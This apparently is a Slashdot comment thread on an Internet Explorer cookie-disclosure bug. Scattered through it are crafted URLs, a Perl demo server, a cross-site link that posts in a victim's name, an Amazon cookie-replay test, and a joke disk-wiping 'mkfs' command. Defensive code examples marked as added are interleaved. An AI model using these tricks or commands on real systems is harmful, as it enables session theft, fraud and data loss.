  114. I am gonna... by GNUs-Not-Good · · Score: 5

    put the Kerberos spec from MS in my cookie file.

    That way they will be responsible for distributing their own trade secrets through their own security holes.

    Then, they can sue themselves.

    1. Re:I am gonna... by degroof · · Score: 1

      Aw, ya beat me to it. (By only 3 minutes, though)

  115. Comment removed by account_deleted · · Score: 2

    Comment removed based on user account deletion

  116. How does this affect zones? by e_n_d_o · · Score: 1

    It would seem to me that determining the Web site that is producing a document is of paramount importance to a Web browser. Why is it that whatever MSIE component that determines the Web site that data is being received from hasn't been thoroughly tested for correctness? This isn't the first time MSIE has had problems here (remember the dotless IP address security zone problem?)

    If it is determining the URL in this way, wouldn't this bug also affect IE's security "zones?" Is it also possible to link to a document like this:

    http://www.evilvirusinfestedhellhole.com?.completelytrustedsite.com

    and have that site operate with elevated security privileges?

  117. I use this program under Windows to filter stuff by Julz · · Score: 1

    Unfortunately it's only Windoze but then Linux does have other tools although it would be nice to have the same tool/GUI on both platforms, anyone? Anyway Naviscope allows you to setup ad blocking and filter Javascript/ActiveX and cookies selectively by site/domain and within sites and it has a default for all sites not mentioned. On top of that it also does prefetching of links on pages, good if you're using a flat rate connection, and can look for specific keywords for prefetching like "next" or "more" or "continue". I've found it very useful for the machine in the lounge which is used as a TV/Media/Games machine and yes it has both Linux and Windoze installed. Windoze gets used by visitors and girlfriend who are too used to Windoze

    --
    When shit hits the fan get some of these https://youtu.be/pY-GncsZ-UE
  118. Proxomitron blocks with without killing JS by Kris_J · · Score: 4

    The default installation of Proxomitron disables this exploit without sacrificing the Javascript functionality needed to enjoy the majority of sites. Cool.

  119. Re:A potential sploit by Madoka+Ayukawa · · Score: 1

    A similar discussion about borrowing cookies or embedding login and password information into the URL at various sites is at: http://talk.dvdtalk.com/ubb/Forum9/HTML/001232.html

    It is a two-page thread about various topics belonging to privacy and how it can be violated or broken.

  120. Re:fun with Amazon's One-Click Shopping (tm) by Mija+Cat · · Score: 1

    It was possible back in the DOS days because there were a limited KNOWABLE list of executables.

    Take a look at c:\windows\ and its tree sometime and tell me anybody could know that mess.

    Meow

    --
    Yes, that's really my e-mail. Don't change a thing.
  121. Re:And if Peacefire didn't report it to MS, then . by Mija+Cat · · Score: 1

    Point of law -
    Anyone CAN sue anyone. This is why the American justice system is swamped, why judges are overbooked, and why there are too damn many landsharks (ahem, lawyers) out there.

    I could, for instance, sue Microsoft for being a bunch of morons.
    That case, like their case against Peacefire, would likely be tossed...provided the judge doesn't get swayed by PR...
    Meow

    --
    Yes, that's really my e-mail. Don't change a thing.
  122. Time to chime in. . . by ksteck · · Score: 1

    Ok, this topic is not the sole reason for my post. This is more like just an excuse to say the following: I am not so upset by this "yet-another-security-flaw-in-M$" notice as I am by the fact that our TAX DOLLARS go to buying countless computer systems with M$ OS and apps on them. Key computer systems vital to our national defence, security, and communication currently run this substandard OS. This should worry you. Mostly I'm just upset that vast amount of tax dollars spent related to M$ issues does not involve the actual purchase of the products, rather the administration costs. M$ products are so prone to problems the government has no option but throw manpower at the problem...which is very expensive. (hell you have to pay anyone with half a brain a ton of money just to ADMIT they know anything about M$ administration IMHO) I think I'll just have to finally start writing to the representatives in congress about this. Too long I've been saying, "Just one lonely letter won't matter..." gotta stop that train of thought. just speaking my $0.02, thanks for listening.

  123. microsoft has released a patch... by Dell+Brandstone · · Score: 1
    The bug with the cookies is now mended in Microsoft's latest and greatest critical security update. (I think it's the 9th or so for NT5)

    -DB

    --
    [ a directive occured while processing this error ]
  124. Re:oh give me a break by ichthus · · Score: 1

    Uh, no. Your C program could not email open my email program, read my address list, and email itself all over the planet. It could delete MP3s, JPGs, etc. if I owned them, but it couldn't delete those belonging to other users. And, it definitely could not replace executable programs with itself.

    Rest assured, though, that if Linux EVER had a problem like this there would be a patch for it the next day.

    --
    sig: sauer
  125. Re:quick question by G27+Radio · · Score: 2

    After what I've seen today, I'm not about to click on that.

    numb

  126. Re:HOWTO Close up the scripting holes by superkorn · · Score: 1

    Open up your My Computer or any other folder. Go to the View menu. Click "folder options." Marvel at the fact that windows is probably hiding tons of files from you if you don't have it set to show hidden files. Anyway, click on the "file types" tab. Find "VBScript (.vbs)" in the list of file types. It will be set to run. Click on edit in the right side of the window there. Pick "edit" off the list of behaviors, then click "set default." Now just click ok a bunch of times and no more VB viruses for you...

  127. How typical! by kkeller · · Score: 1
    This is simply another example of M$ trying to run Linux out of the market by strongarming web sites to target their web pages to Windows/ IE. Such a blatant demonstration of their monopoly power is further evidence that they must be broken up! Only with a breakup will such powerful features be available to non-MS users.

    --keith

  128. Re:HOWTO Close up the scripting holes by amlai · · Score: 1

    In Explorer(NOT I.E.), View|options|file types choose VBS Highlight "Edit" in the "Actions" Panel then click "Set Default"

  129. Re:oh give me a break by Cassandra · · Score: 1

    Hmm if I compiled a C program for Linux and mailed it to a Linux user, couldn't the same thing happen if he/she ran it? Where's the patch??????

    You can't just double click the attachment to run it, or can you? At least I can't do that. If you have to save it, then run it you will have some more time to think, and you will definitely know that you are executing a program by then. As someone pointed out here earlier, the executable extension (.exe) is hidden by default in Wxx, so you might not even know that you are executing a binary if the file is called niftypicture.gif.exe or similar.

  130. MS Contradictions by LordSkippy · · Score: 2
    What I find interesting is that this bug doesn't appear in the http header support for cookies. This means the http header group and the JavaScript group used different approaches and code to the same problem.

    Why is that interesting? Because, MS is arguing that consumers need MS to remain one company so the OS side and software side can work close together and provide us with more powerful software, and breaking them up would stifle "innovations" in future products - resulting in less powerful and less user-friendly tools for consumers.

    MS expects people to believe that, when they can't even effectively share algorithms, programming procedures, and code within the same software product?

    MS = BS;

    --
    My karma is in a nose dive
  131. Re:HOWTO Close up the scripting holes by jchristl · · Score: 1

    HowTo turn-off scripting holes in outlook/IE
    --------------------------------------------
    In Add/Remove Programs, select Microsoft Outlook. Click the Add/Remove button. After it uninstalls, then Install a different Email client, preferably Pegasus Email.

    Joe

  132. Oh no!! by EddieLawhead · · Score: 1

    I've been storing a certain trade secret in my browser which was made by the same company that a new trade secret came from. I guess I just thought that the company's own software would be the best place to store such important information.

    I guess I'll have to delete that cookie, but where the heck am I going to store this important trade secret now?

    What am I going to do?? I'm so confused.


    --


    Check Out Knexa.Com
    KNowledge EXchange Auction
  133. Other solutions... by angramainyu · · Score: 1

    I'm running IDcide, and it seems to block access to the cookies. I'd also recommend JunkBuster for those who like to browse sites that need javascript, but want to protect their privacy.

  134. Re: How do you turn off Javascript in MSIE? by knuth · · Score: 1
    1. View
    2. Internet Options
    3. Security (tab)
    4. "Zone" probably says "Internet zone". That's fine.
    5. Check the radio button at the bottom for "Custom".
    6. Use the Settings button.
    7. Scroll wayyyyy down. Last set of radio buttons, for Scripting/Active Scripting.
    8. Disable.
    9. OK.
    10. OK.

    Microsoft innovation in action again. Like "friendly URLs". Furrfu. They couldn't call it JavaScript, noooooo... they had to give it a cutesy obscure name.

  135. Windows 2000 is affected as well by tk · · Score: 1

    Windows 2000 is affected as well, of course.

    -tk

    --
    -tk
  136. UNIX _IS_ affected by cpeterso · · Score: 1

    "effect" is a noun. "affect" is a verb. UNIX is affected.

    1. Re:UNIX _IS_ affected by Tower · · Score: 1

      >effect is also a transitive verb
      >check the dictionary, it seems to say your troll is misguided and archaic.

      nope, actually - 'effected' has a totally different meaning, even as a verb.

      He effected the change, but the change affected her.

      He caused the change, the change did not cause her, and was not caused by her, it just happened to alter circumstances that she cared about.

      Not the same at all.

      Affect as a noun (emphasis on the other syllable) relates more to mood. 'She has a flattened affect due to her use of meth years earlier' is one of the more popular uses. Killing off of dopamine receptors, that sort of thing.

      Again - Not the same at all.

      --
      "It's tough to be bilingual when you get hit in the head."
  137. And the paranoids will survive by Camel+Pilot · · Score: 3

    As was pointed out a lot of sites use cookies to maintain session. Therefore if I can steal the session ID for let's say Amazon I could send you $20000 dollars of books as a joke. That is not funny.

    This hole depreciates the value of "Netscape" cookies which is a nice way to maintain session with a connectionless protocol.

  138. Kerberos in a Cookie? by degroof · · Score: 1

    So, is it a violation of the Digital Millennium Copyright Act to place the entire text of Microsoft's Kerberos extensions spec in a cookie that is available only to microsoft.com? Assuming that you are in rightful possession of the spec and since cookies are supposed to be private and reasonably secure, it would seem that you've taken precautions to protect their confidential information. The fact that a bug in IE allows everyone and his dog to view anyone's cookies can't be construed as negligence on your part, can it?

  139. Re:Asking for Trouble by Anonymous Coward · · Score: 1

    "Is this Slashdot slowdown just a coincidence? I think not. Slashdot is now the victim of an official Microsoft Denial of Service Attack. "

    What do you call a Denial of Service Attack from Microsoft?
    an MS-DOS attack :o(

  140. Re:IDcide fix? by BLiP2 · · Score: 1

    I'm using IDcide on IE 4 in win98. With it "enabled" none of the sites work. Once I click on "disable IDcide" from the hat menu, I can retrieve some of my cookie file.

    --
    Vote Technocratic! Government by killer robots!
  141. Re:It's all DOJ's fault by Oarboat_7 · · Score: 1

    Wow, you sure have a low opinion of all the non-Microsoft software on the 'net. Do you really think the DOJ is the only thing saving poor little us from Big Bad Microsoft?

  142. NT4 as well by barzok · · Score: 1

    NT4, SP5, IE5 it works.

  143. And the paranoids rejoice!! by Sasquach · · Score: 4

    Oh GOSH. Now they have the fake name/address/e-mail I always put on stupid registrations. So let Bob Gobman at 1 Happy St. get all the junk mail destined for me. And let the unfortunate fellow whose e-mail is bob@bob.bob get all the spam destined for me.

    Is it just me or do people find reasons to get all up in arms for nothing. For all of you who will respond that this is a big deal, remember your name/address AND phone number are all available in your local phone book. And if you are THAT paranoid about common public information, then DON'T POST YOUR REAL DATA!!!

    1. Re:And the paranoids rejoice!! by Oarboat_7 · · Score: 1

      Personally, it pisses me off that eCommerce sites insist on me establishing an 'account' on their server, and a password to access my Credit Card #, etc. that they've tucked away on their site.

      I don't want them keeping my information any longer than it takes to process and ship my order.

      On the one occasion when I made the mistake of ordering from Amazon.com, I tried shortly thereafter to get them to delete all information about me. They responded with all sorts of questions (details of the order I had placed), basically refusing to delete the info unless I provided it.

      At least they don't spam me anymore.

  144. I don't believe this... by ccoakley · · Score: 2
    This can't be true. The man who sold me my computer said that Windows 2000 would make surfing the internet safer and faster than ever before. He also said that using the email with Wondows 2000 would be safe. First the lovebug and now cookie thieves! I think you people just make this stuff up.

    --
    Network Security: It always comes down to a big guy with a gun.
  145. Macintosh users, beware... by debugdave · · Score: 1

    ...this bug also affects IE5 for the Macintosh. So fellow Mac users, don't think we aren't touched by Microsoft's stupidity...because we are.

    just thought y'all should know

    djsw

  146. This is pathetic. by qnonsense · · Score: 2

    I am shocked. This is pathetic.

    If I were the Justice Department (or United Nations, or DoD, or CIA, or FBI, or ANYONE who gave a damn about security ) I would be seriously considering if Microsoft products have any place on my desk, in my office or in my life. The open cookie jar isn't so much what bothers me but this is the straw that breaks this camel's back.

    Microsoft's attitude toward security and toward the end user in general is atrocious. I don't really care what you think, but it IS Microsoft's fault that the default install of Windows 98 using the default mail client simply by reading the ILOVEYOU message will be rendered useless. Now this???? I mean COME ON!

    Oh and BTW... the whole Kerberos thing? Microsoft released the specs as a trade secret. TRADE SECRETS HAVE NO PROTECTION UNDER THE LAW ONCE THEY ARE LEAKED . That's why they are guarded so viciously.

    Oh, and another thing which is completely offtopic: I think that the UCITA, Section 307, Subsection 2(e) invalidates the GPL!!! It is a description of what kinds of software licenses are valid. It reads "(e) Neither party is entitled to receive copies of source code, schematics, master copy, design material, or other information used by the other party in creating, developing, or implementing the information."
    This would seem to mean that no one needs return code as the GPL demands. What do you guys think???

    --
    There comes a time in every man's life when he must say, "No mother! I do not want any more Jell-O!"
  147. The other problem by G27+Radio · · Score: 4

    I mentioned this yesterday in the Hotmail thread but it kinda got lost in the shuffle. Slashdot should post an article about the "client-side trojans" discussion that is going on at Zope. Slashdot isn't the only site affected by this--and it's a simple hack:

    WARNING: Clicking this link will cause an article to be posted on Slashdot in your name

    Obviously such a link wouldn't need to warn you what it does, or post such an innocuous message. Maybe I could make it post your slashdot cookies to o :)

    You can see the results in sid=numb and there is a link to the source in there too.

    numb

    1. Re:The other problem by G27+Radio · · Score: 2

      Hot damn...gotta like being one of the Anonymous Cowards in that sid. Is anyone else concerned by the sheer number of people that went ahead and clicked it? Aren't you people the ones that are always crowing about how much smarter you are than the average "luser"? Everyone just believed that all that script would do is post a comment, just like a bunch of idiots believed that someone at Dow Jones sent them love letters.

      All it did was post a comment. There's a link to the source at sid=numb. It could have done worse though if I had added the javascript thing (provided you use Windows and IE.) As for clicking links no one is safe (unless they have redirection disabled.) I could e-mail a similar link and have it look completely benign, yet have it post something incredibly embarrassing.

      BTW, to find out more about it click here.

      or just go to http://www.kuro5hin.org/?op=displaystory&sid=2000/5/9/183550/1910 if you don't trust the link :)

      One other thing, I used a PHP script because Slashdot's software recognizes duplicate posts and I needed to make the content dynamic. However, for a targeted attack plain old HTML on a geocities web page would do the trick.

      numb

      numb

    2. Re:The other problem by Black+Parrot · · Score: 2

      > WARNING: Clicking this link will cause an article to be posted on Slashdot in your name

      Think how mad someone would be if all those 300+ posts (so far) had been copies of a certain "trade secret" that has been mentioned here lately.

      --
      Sheesh, evil *and* a jerk. -- Jade
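
The "post in your name" link discussed in thread 147 works when a site accepts a state-changing request on the strength of the cookie alone. One common server-side countermeasure is a per-session form token, shown here as an added example that is not part of the original posts and not Slashdot's code; the request shape, field names and key handling are assumptions.

```javascript
// Added example; request shape and names are hypothetical.
const crypto = require("crypto");

// Constructed secret for the example. A real deployment would load a
// long-lived key from configuration instead of generating one per process.
const SERVER_KEY = crypto.randomBytes(32);

// The token is an HMAC over the session id, so it is bound to one session
// and cannot be computed by a third-party page that only knows the form URL.
function issueFormToken(sessionId) {
  return crypto.createHmac("sha256", SERVER_KEY).update(sessionId).digest("hex");
}

// Constant-time comparison of the submitted token against the expected one.
function tokenIsValid(sessionId, token) {
  if (typeof token !== "string") return false;
  const expected = Buffer.from(issueFormToken(sessionId), "hex");
  const given = Buffer.from(token, "hex"); // malformed hex yields a short buffer
  return given.length === expected.length && crypto.timingSafeEqual(given, expected);
}

// Decide whether a comment submission is accepted.
// request: { method, sessionId, fields: { subject, body, formToken } }
function acceptPost(request) {
  // A followed link or redirect arrives as GET: never change state on GET.
  if (request.method !== "POST") {
    return { ok: false, reason: "state change requires POST" };
  }
  if (!request.sessionId) {
    return { ok: false, reason: "not logged in" };
  }
  // The browser attaches the session cookie automatically, but only a form
  // served by this site carries the matching token.
  if (!tokenIsValid(request.sessionId, request.fields.formToken)) {
    return { ok: false, reason: "missing or invalid form token" };
  }
  return { ok: true, reason: "accepted" };
}
```

The token goes into a hidden field of the comment form when the site renders it, so the check costs the legitimate user nothing.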
  148. Virtual hosting and other problems for Apache by jonathanclark · · Score: 3

    I noticed this exploit causes problems with Apache as well. This could possibly cause a security hole somewhere:

    when I specify a URL like this:

    http://www.somewhere.com/test.php3?q=8

    apache correctly reports:

    "Host: www.somewhere.com"

    but when I specify a URL like this:

    http://www.somewhere.com%2ftest.php3%3fq=8

    apache reports:

    "Host: www.somewhere.com/jc/test.php3?q=8"

    This means apache is confused on what host you are trying to reach and virtual hosting will resort to the default hostname. I confirmed this on my web server.

    But... for some reason the cookie exploit doesn't work for me. I tried it on w2k and IE 5.
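
The Host values reported in comment 148 and the zone question in comment 116 both come down to deciding where the host part of a URL ends. The following added example (not from the original posts, and not IE's or Apache's code) contrasts an assumed model of the faulty behaviour with a strict check; the function names, the `.shop.example` cookie jar and the virtual-host table are constructed.

```javascript
// Added example. naiveHost() is an assumed model of the faulty behaviour
// described on this page, not code from any browser or server.

// Everything between "//" and the first literal "/", "?" or "#", as written.
function rawAuthority(url) {
  const m = /^https?:\/\/([^\/?#]*)/i.exec(url);
  if (m === null) throw new Error("not an http(s) URL: " + url);
  return m[1];
}

// Faulty model: accept the raw authority as the host with no syntax check,
// so "%2f" and "%3f" end up inside the "machine name".
function naiveHost(url) {
  return rawAuthority(url).toLowerCase();
}

// DNS-style hostname: dot-separated labels of letters, digits and hyphens.
const LABEL = "[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?";
const HOSTNAME = new RegExp("^(?:" + LABEL + "\\.)*" + LABEL + "$");

// Strict check on an authority or Host header value: strip an optional port,
// then require hostname syntax. "%", "/", "?" and "@" never pass.
function validHostname(authority) {
  const host = String(authority).toLowerCase().replace(/:\d{1,5}$/, "");
  if (host.length === 0 || host.length > 253) return null;
  return HOSTNAME.test(host) ? host : null;
}

function strictHost(url) {
  return validHostname(rawAuthority(url));
}

// Cookie domain match: the host equals the domain or is a subdomain of it.
function domainMatches(host, cookieDomain) {
  if (host === null) return false;
  const domain = cookieDomain.replace(/^\./, "").toLowerCase();
  return host === domain || host.endsWith("." + domain);
}

// Names of the cookies a page at `url` may read, given a host function.
function cookiesFor(url, jar, hostFn) {
  const host = hostFn(url);
  return jar.filter((c) => domainMatches(host, c.domain)).map((c) => c.name);
}

// Server side: an invalid Host header is refused (null) instead of being
// served from the default virtual host.
function virtualHostFor(hostHeader, table) {
  const host = validHostname(hostHeader);
  return host !== null && table.has(host) ? table.get(host) : null;
}

// Constructed sample data.
const JAR = [
  { name: "session", domain: ".shop.example" },
  { name: "prefs", domain: ".somewhere.com" },
];
const VHOSTS = new Map([["www.somewhere.com", "/srv/somewhere"]]);
```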

  149. Never using IE again!!!!! by JohnT · · Score: 1

    I used to use NS but I switched to IE b/c that was what everyone was using, but not anymore. Bring on Netscape 5 . . . er 6!

  150. Other options by sonnerbob · · Score: 1
    Hadn't heard of Proxomitron before. Thanks.

    Other options:

    1. Use another browser. I recommend Opera.
    2. Install IDcide. Seems to work for me.
    3. Use a "cookie managing" anonymizer like PrivadaProxy or Freedom. They aren't free...I prefer Freedom...and not just because the link includes my affiliate ID :-)
    4. Use a "cookie managing" Web-based proxy. If you are going to surf promiscuously (whatever that means) where this exploit might rear its head, you can use The Cloak which is distinguished from Anonymizer et al. in that it caches cookies remotely. Bandwidth limiting and you have to remember to use it, but it's free of charge.
    5. Live with it until the fix is in.

      A proxy comparison chart


  151. It's the cookies, stupid by Anonymous+Elf · · Score: 1

    Sorry, but disabling javascript doesn't do JACK to fix the problem (I've got everything else disabled too - paste, activex, all java, EVERYTHING).

    The only way to solve the problem on my platform so far (IE4, NT4) is to disallow / from receiving cookies (via Junkbuster).

    That is unfortunate because it is impossible to login without cookies. Perhaps / needs to revisit its cookie use policy. They ARE evil.

    I finally "register" and create an account only to find one more reason why AC's are absolutely right.

  152. HOWTO Close up the scripting holes by xDroid · · Score: 4


    HowTo turn-off scripting holes in outlook/IE.
    ------------------------------------------
    In outlook/IE,

    tools -> options -> Security -> Zone settings -> Custom level ->

    under the scripting section disable
    Active scripting,
    Allow Paste operations, and
    Scripting of Java applets.

    Press ok till you are back in outlook/IE.

    then you will not be at risk for a copy-cat ILOVEYOU virus or IE cookie monsters.

    (Of course you all probably did this the first day you opened outlook, right.)
    ------------------------------------------

    PS --
    Here is a very nice solution to the .vbs email attachment problem.
    (add .txt to the attachment making it a text file)
    I'm not sure how to implement this in Exchange, though.
    (from Rick Johnson off the saclug.org mailing list)

    -- Andy

    --

    * "Uncle this droid is malfunctioning" -- Luke Skywalker
    1. Re:HOWTO Close up the scripting holes by thechink · · Score: 3

      HowTo turn-off scripting holes in outlook/IE.

      Sorry but this does not stop the ILUVYOU virus. What you suggest disables scripts in HTML formatted email and that does stop viruses like Bubbleboy for example. It DOES NOT stop scripts sent as email attachments (ala ILUVYOU, Melissa etc) BIG DIFFERENCE. Many people seem to be having trouble understanding this. Scripts in HTML email are run by the IE script engine and are controlled by the settings in Internet Options. These are the kind of scripts that can run in the preview pane automatically. Email attachment scripts are run by the Windows Scripting Host and are run outside of Outlook (or any other emailer) and have to be run by the user. The way to fix this problem is to either remove the WSH or change the default association for VBS and JS script files.

    2. Re:HOWTO Close up the scripting holes by xDroid · · Score: 1

      I forgot to mention to delete wscript.exe.
      sorry.

      -- Andy

      --

      * "Uncle this droid is malfunctioning" -- Luke Skywalker
    3. Re:HOWTO Close up the scripting holes by DreamerFi · · Score: 2

      no, no, far easier:

      mkfs /dev/rwd0a

      -John

    4. Re:HOWTO Close up the scripting holes by thechink · · Score: 1

      That'll do it. But it might be better to use the Add/Remove Programs applet to delete WSH.

      I found a good solution is to change the default action for VBS files to EDIT rather than OPEN. So when you double-click on a VBS file it will open in Notepad instead of executing. You still have the option of running the script by right clicking and selecting OPEN. This way you can keep the many benefits of the WSH and be safe too. It's a good idea to do this to JS (JavaScript) files too.

  153. I decided... by Anonymous+Elf · · Score: 1

    That sigs are stupid. It doesn't always fit the tone of my message, which is often "get bent" or "trollz rule".

    I did change my url to sendmoreinfo.com - so if you use me as a referrer you too may someday be up to $0.75 in BIG BIG earnings.

  154. A potential sploit by MoxCamel · · Score: 4

    So does this mean I can grab somebody's Amazon.com cookie, paste it into my own cookie file, and order stuff from Amazon using "One-click"?

  155. How do you turn off Javascript in MSIE? by drivers · · Score: 1

    I consider myself a pretty smart computer user, but how the hell do you turn off javascript in IE? I looked through all the settings. I even tried the Help file. I'm sure other people would like to know as well.

    (I usually use IE at work and Navigator and/or Mozilla at home.)

    1. Re:How do you turn off Javascript in MSIE? by puppet10 · · Score: 2

      And if you want to still use Javascript at certain sites but not promiscuously ;) get IE power toys (tools) at the microsoft web site and set up the internet zone as the other people have said and set the trusted zone to allow javascript (since some sites won't work at all without javascript).

      The power tools allow you to switch a site into the trusted zone just by clicking

      Tools>Add to Trusted zone

      and you can delete the site from your trusted list in the usual manner (Tools>InternetOptions...>security>trusted sites remove)

      This makes it easier to allow cookies at Slashdot and not at Joe Website who hates all people and will screw them over any chance he gets.

      --
      -------- This space intentionally left blank --------
  156. ok by Anonymous+Elf · · Score: 1

    That makes more sense. I doubt it will happen anytime soon. Some webstores will have a clue, most won't. IT infrastructure can be even harder to change than physical infrastructure at times.

  157. hey, it's not so bad by / · · Score: 1

    You can just switch to a PPC computer of some sort, run linuxppc, and run iCab under mac on linux. Of course, most of the machines that fit that description are macintoshes....

    --
    "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
  158. Doesn't do anything on 2000 by kdekorte · · Score: 1

    Well I tried this CGI script out on a Win 2000 box and it doesn't do anything. Just a blank page when it loads. So I think maybe there is an over reaction to this a bit. Maybe the machines being tested didn't have the latest security patches installed...

  159. so does iCab by / · · Score: 1

    available here. It also allows finer grained control, like only permitting cookies to be accepted from certain sites, besides being a superior browser.

    --
    "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
    1. Re:so does iCab by mikemulvaney · · Score: 1

      Wow, that's great! All I have to do is switch to a Macintosh! That's a great solution, thanks!

      At home I use netscape under Linux, and I run a script that cleans out my cookies.txt file often. But I shouldn't have to do that, the browser should do it for me.

      At work I have to use Windows for testing purposes(I work on a Sun).

      Mike

  160. yes by mr_death · · Score: 5
    Just ran a test with my own amazon account. With 1-click turned on in a previous session:

    1. with my cookies, 1-click enabled.

    2. close browser, remove amazon cookies.

    3. open browser, amazon asks me to log in; no 1-click

    4. close browser, put amazon cookies back

    5. open browser, amazon recognizes me, 1-click enabled, no password required.

    Another reason to turn off 1-click. If you don't, you might find a weird set of books on your doorstep, and one maxed-out credit card.

    --
    It's Linux, damnit! Pay no attention to renaming attempts by self-aggrandizing blowhards.
  161. This Exploit Doesn't Send Wrong Cookies To Server by spifman · · Score: 1

    The bug is only in the client-side javascript (i.e. your other-site cookies AREN'T sent to this site). Consider this bit of perl code:

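    #!/usr/bin/perl -w

    use strict;

    use IO::Socket::INET;

    # Listen on port 80 (needs root); stop with a message if the port cannot be bound.
    my $socket = IO::Socket::INET->new(Listen => 30, LocalPort => 80, Proto => 'tcp')
        or die "cannot listen on port 80: $@\n";

    $| = 1;
    $socket->listen();
    my $newsock = undef;
    while ($newsock = $socket->accept()) {
        # Echo the request line and headers (any Cookie: header included)
        # to the terminal, stopping at the blank line that ends the headers.
        my $getNext = 1;
        my $line = '';
        while ($getNext && ($line = $newsock->getline())) {
            print $line;
            chomp $line;
            if (length $line < 2) {
                $getNext = 0;
            }
        }
        print "***done****\n";
        # Canned response: the page shows whatever document.cookie returns in the browser.
        my $foo = <<EOS;
    HTTP/1.1 200 OK
    Date: Thu, 11 May 2000 19:33:11 GMT
    Server: Apache/1.3.0 (Unix)
    Last-Modified: Thu, 11 May 2000 04:19:57 GMT
    ETag: "23a5f-82-391a34ed"
    Accept-Ranges: bytes
    Content-Length: 130
    Connection: close
    Content-Type: text/html

    The value of your cookie for the domain you entered is:<br>
    <script>
    document.write('<b>' + document.cookie + '</b>');
    </script>
    EOS
        $newsock->print($foo);
        # Close the connection so the browser sees the end of the response.
        $newsock->close();
    }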

    I lifted the response by telnetting to www.peacefire.org and issuing a:

    GET /security/iecookies/showcookie.html?.foo.com/ HTTP/1.0

    Follow these steps to see that your cookies aren't being sent:
    * turn on cookies in your ie5 browser
    * pick two sites that issue cookies and visit those sites to make sure the cookies are set
    * run the above perl script (as root, it's on port 80) on your favourite box
    * set up a hosts file on your windows box for www.firstsiteyoupicked.com to point to the box you're running the perl script on
    * go to http://www.firstsiteyoupicked.com%2ffoo.html%3F.secondsiteyoupicked.com/
    * you'll note that IE dutifully sent the cookies from firstsiteyoupicked.com to the web server (see output of the perl script)
    * you'll also note that in your IE5 window the cookies for secondsiteyoupicked.com show up.

    So, I think this shows that it is a client-side only bug (but a bug nonetheless).

  162. Use IDcide. by borzwazie · · Score: 1

    I'm running the IDcide plugin for IE, and I cannot retrieve any of the cookies on my browser, including /., amazon.com, doubleclick, or any of the other sites that I regularly visit that I get cookies from. Just thought you'd like to know.

    --

    "We apologize for the inconvenience."

  163. What about amazon's 1 click ? by Gog · · Score: 1

    I never used it but if it really works in 1 click, the cookie must be the way to say user = CC number

  164. sorry you need to check your facts by SEAL · · Score: 1

    Microsoft fixed the problem which allowed scripts to run without clicking them a long time ago.

    Being curious, I followed your link. If you take the time to follow the next link (to Microsoft's hotfix), you'd see that it was taken care of last year.

    If you were running a year old version of Linux, you wouldn't go ranting and raving about how it is full of exploits would you? No, you'd patch up to the latest.

    SEAL

  165. Microsoft has known about this for months by Marc+Slemko · · Score: 5

    I reported a similar bug to Microsoft on March 19th. My particular example was a URL in the form "http://10.0.0.1%20.msn.com/foo.html" which causes IE to load content from 10.0.0.1 but the Javascript code thinks it is .msn.com; this is a symptom of either the same problem or a very similar one.

    However, they took their time to deal with it. I did not pressure them on it since I had more important things to worry about.
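Added example, not part of the thread and not IE's code: a JavaScript model of the disagreement that spifman's and Marc Slemko's comments describe, where one parser percent-decodes the authority before finding the host and another does not, shown next to a strict parser that refuses such URLs. The hostnames, the cookie jar and every function name are constructed, and the two flawed parsers are assumptions about the behaviour reported above.

```javascript
// Constructed data: placeholder hostnames and cookie names.
const JAR = [
  { domain: ".firstsite.example", name: "session_a" },
  { domain: ".secondsite.example", name: "session_b" },
];
const CRAFTED = "http://www.firstsite.example%2ffoo.html%3F.secondsite.example/";
const CRAFTED_SPACE = "http://10.0.0.1%20.secondsite.example/foo.html";

// Authority = text between "scheme://" and the first literal "/", "?" or "#".
function rawAuthority(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/?#]*)/i.exec(url);
  return m ? m[1] : null;
}

// Parser A (assumed network side): percent-decode first, then stop at the
// first character that cannot be part of a hostname.
function hostDecodeFirst(url) {
  const auth = rawAuthority(url);
  if (auth === null) return null;
  let decoded;
  try {
    decoded = decodeURIComponent(auth);
  } catch (e) {
    return null; // malformed escape such as "%zz"
  }
  return /^[A-Za-z0-9.-]*/.exec(decoded)[0].toLowerCase();
}

// Parser B (assumed script side): never decodes, so the whole authority is
// taken to be one very long machine name.
function hostSplitOnly(url) {
  const auth = rawAuthority(url);
  return auth === null ? null : auth.toLowerCase();
}

// Strict parser: split on literal delimiters, then refuse anything that is
// not a plain host[:port]. "%", spaces and userinfo all fail here.
function strictHost(url) {
  const auth = rawAuthority(url);
  if (auth === null) return null;
  const m = /^([A-Za-z0-9.-]+)(?::\d{1,5})?$/.exec(auth);
  if (!m) return null;
  const host = m[1].toLowerCase();
  const labelsOk = host.split(".").every(
    (l) => l.length >= 1 && l.length <= 63 && !l.startsWith("-") && !l.endsWith("-")
  );
  return labelsOk ? host : null;
}

// Cookie domain matching: exact host or a dot-separated suffix of it.
function domainMatches(host, cookieDomain) {
  const d = cookieDomain.toLowerCase().replace(/^\./, "");
  return host === d || host.endsWith("." + d);
}

// Names of the cookies a given host would be allowed to read.
function cookiesFor(host, jar) {
  if (host === null) return [];
  return jar.filter((c) => domainMatches(host, c.domain)).map((c) => c.name);
}

for (const url of [CRAFTED, CRAFTED_SPACE, "http://www.firstsite.example/foo.html"]) {
  console.log(url);
  console.log("  decode-first host:", hostDecodeFirst(url), cookiesFor(hostDecodeFirst(url), JAR));
  console.log("  split-only host:  ", hostSplitOnly(url), cookiesFor(hostSplitOnly(url), JAR));
  console.log("  strict host:      ", strictHost(url), cookiesFor(strictHost(url), JAR));
}
```

The fix is to derive the host once, with the strict parser, and use that single value both for the connection and for cookie scoping.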

  166. Huh?! - Ridiculous Response by curveclimber · · Score: 2

    You believe that disabling javascript or turning off cookies completely is an acceptable solution to this problem?

    If a security hole is found next week, in something that can't be disabled, will your suggestion be: "what's the big deal don't surf for a while. I'm sure Microsoft will have a patch out soon."

    While the post you're responding to did ramble, I think that a person is justified in being tired of the poor designs force fed to most of the world by Redmond.

    And the idea that we shouldn't get upset, because there will *probably* be a patch to fix the problem makes me sad. With that kind of thinking out there things aren't going to get better any time soon.

  167. The Real Bug. by BobLenon · · Score: 1

    Well, in an attempt to see how bad this bug was ... i couldn't visit the page with IE ... i think that's an even worse bug, as IE gpf'd me.

    Hmmm. ;)

    --

    /* Lobster Stick To Magnet!*/
  168. ok, differentiate for me by Anonymous Coward · · Score: 1


    Linux security is strengthened by people looking for problems and reporting them.

